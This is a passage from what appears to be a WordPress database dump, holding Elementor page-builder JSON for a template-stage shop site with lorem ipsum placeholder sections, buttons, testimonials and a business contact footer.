Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8789,1518,'_elementor_page_assets','a:0:{}'),(8807,1520,'_elementor_edit_mode','builder'),(8808,1520,'_elementor_template_type','wp-page'),(8809,1520,'_elementor_version','3.7.8'),(8810,1520,'_wp_page_template','elementor_canvas'),(8811,1520,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":88.899000000000001,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":11.054},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John 